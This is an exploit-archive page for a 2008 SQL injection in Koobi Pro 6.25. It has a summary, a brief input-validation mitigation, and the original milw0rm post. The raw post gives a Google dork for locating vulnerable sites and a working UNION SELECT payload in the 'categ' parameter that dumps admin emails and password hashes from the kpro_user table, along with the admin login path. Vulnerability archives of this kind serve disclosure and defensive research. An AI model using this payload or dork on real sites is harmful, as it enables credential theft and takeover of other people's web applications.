header-logo
Suggest Exploit
vendor:
Koobi Pro
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Koobi Pro
Affected Version From: 6.25
Affected Version To: 6.25
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Koobi Pro 6.25 links(categ)

An attacker can exploit a SQL injection vulnerability in Koobi Pro 6.25 by sending a maliciously crafted HTTP request to the vulnerable application. This request contains a specially crafted SQL statement that when executed, will return the email and password of the admin user from the kpro_user table. The attacker can then use this information to gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

##########################################
#
# Koobi Pro 6.25 links(categ)
#
all version Koobi

##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?showlink"links
#
###########################################
EXPLOiT :

index.php?showlink=S@BUN&fid=S@BUN8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
admin login=admin/login.php

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

# milw0rm.com [2008-04-08]